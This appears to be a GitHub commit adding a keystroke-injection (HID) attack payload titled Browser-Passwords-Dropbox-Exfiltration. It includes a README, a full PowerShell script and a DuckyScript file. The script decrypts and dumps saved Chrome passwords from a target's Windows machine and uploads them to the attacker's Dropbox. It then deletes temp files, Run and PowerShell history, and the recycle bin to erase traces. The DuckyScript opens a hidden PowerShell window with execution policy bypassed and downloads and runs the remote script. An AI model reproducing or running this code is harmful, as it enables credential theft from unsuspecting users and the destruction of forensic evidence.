Darren Kitchen
GitHub
commit
539901e2e7
|
|
@ -0,0 +1,30 @@
|
|||
## About:
|
||||
* Title: Browser-Passwords-Dropbox-Exfiltration
|
||||
* Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.
|
||||
* Then it cleans up traces of what you have done after.
|
||||
* AUTHOR: DIYS.py
|
||||
* Version: 1.0
|
||||
* Category: Credentials, Exfiltration
|
||||
* Target: Windows 10
|
||||
* Attackmodes: HID
|
||||
|
||||
### Features:
|
||||
* Reasonably stelathy
|
||||
* Fairly quick
|
||||
|
||||
### Workflow:
|
||||
* Encoding payload and injecting on target's system.
|
||||
* Checks Chrome files and obtains the stored browser credentials
|
||||
* Saves a plaintext file of all of the usernames, passwords, websites
|
||||
* Deletes the Temp files, recycle bin, Run and PowerShell history
|
||||
|
||||
### Usage Version 01:
|
||||
1. Follow the instructions on the link enclosed in the PowerShell script to create the correct API access credentials for your Dropbox account.
|
||||
2. Obtain your Authentication Token and add it to the PowerShell script, upload that script to your dropbox and add the link to it in the payload file.
|
||||
3. Encode payload.txt and inject into target's system.
|
||||
4. Check your Dropbox for the files.
|
||||
|
||||
### Possible Issues:
|
||||
1. AVG detected this was trying to access Chrome info and blocked it from working some of the time.
|
||||
|
||||
DIYSpy on Twitter
|
||||
|
|
@ -0,0 +1,101 @@
|
|||
#########################################################################################################
|
||||
# | #
|
||||
# Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
|
||||
# Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
|
||||
# Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
|
||||
# Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
|
||||
# Target : Windows 10 | |____/___| |_| |____(_) .__/ \__, | #
|
||||
# Mode : HID | |_| |___/ #
|
||||
# Props : I am Jakoby, NULLSESSION0X | #
|
||||
# | #
|
||||
#########################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This script exfiltrates credentials from the browser via Dropbox.
|
||||
.DESCRIPTION
|
||||
Checkes and saves the credentials from the Chrome browser, then connects to Dropbox and uploads
|
||||
the file containing all of the loot.
|
||||
.Link
|
||||
https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
|
||||
#>
|
||||
|
||||
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
|
||||
|
||||
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
|
||||
|
||||
#Stage 1 Obtain the credentials from the Chrome browsers User Data folder
|
||||
|
||||
#First we Kill Chrome just to be safe
|
||||
Stop-Process -Name Chrome
|
||||
|
||||
$d=Add-Type -A System.Security
|
||||
$p='public static'
|
||||
$g=""")]$p extern"
|
||||
$i='[DllImport("winsqlite3",EntryPoint="sqlite3_'
|
||||
$m="[MarshalAs(UnmanagedType.LP"
|
||||
$q='(s,i)'
|
||||
$f='(p s,int i)'
|
||||
$z=$env:LOCALAPPDATA+'\Google\Chrome\User Data'
|
||||
$u=[Security.Cryptography.ProtectedData]
|
||||
Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}"
|
||||
$s=[W]::O("$z\\Default\\Login Data",[ref]$d)
|
||||
$l=@()
|
||||
if($host.Version-like"7*"){$b=(gc "$z\\Local State"|ConvertFrom-Json).os_crypt.encrypted_key
|
||||
$x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0)
|
||||
for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3)
|
||||
$c=[W]::B($s,5)
|
||||
try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length
|
||||
$e=[byte[]]::new($k-31)
|
||||
$x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e|%{[char]$_})-join''}
|
||||
#After Decrypting the contents of the files, save them to a file in the temp folder.
|
||||
|
||||
echo $l >> $env:TMP\$FileName
|
||||
|
||||
#Start Chrome again
|
||||
|
||||
$pathToChrome = 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
|
||||
Start-Process -FilePath $pathToChrome
|
||||
|
||||
#Stage 2 Upload them to Dropbox
|
||||
|
||||
<#
|
||||
.NOTES
|
||||
This is to upload your files to dropbox
|
||||
#>
|
||||
|
||||
$TargetFilePath="/$FileName"
|
||||
$SourceFilePath="$env:TMP\$FileName"
|
||||
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||
$authorization = "Bearer " + $DropBoxAccessToken
|
||||
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||
$headers.Add("Authorization", $authorization)
|
||||
$headers.Add("Dropbox-API-Arg", $arg)
|
||||
$headers.Add("Content-Type", 'application/octet-stream')
|
||||
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||
|
||||
|
||||
#Stage 3 Cleanup Traces
|
||||
|
||||
<#
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
|
||||
exit
|
||||
|
|
@ -0,0 +1,25 @@
|
|||
REM #########################################################################################################
|
||||
REM # | #
|
||||
REM # Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
|
||||
REM # Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
|
||||
REM # Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
|
||||
REM # Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
|
||||
REM # Target : Windows 10 (PowerShell + Chrome) | |____/___| |_| |____(_) .__/ \__, | #
|
||||
REM # Mode : HID | |_| |___/ #
|
||||
REM # Props : I am Jakoby, NULLSESSION0X | #
|
||||
REM # Description : Opens PowerShell hidden, grabs Chrome | #
|
||||
REM # passwords, saves as a cleartext file and | #
|
||||
REM # exfiltrates info via Dropbox. | #
|
||||
REM # Then it cleans up traces of what you have done | #
|
||||
REM # after. | #
|
||||
REM #########################################################################################################
|
||||
|
||||
ATTACKMODE HID
|
||||
|
||||
DELAY 3000
|
||||
GUI r
|
||||
DELAY 250
|
||||
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl
|
||||
|
||||
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
||||
Loading…
Reference in New Issue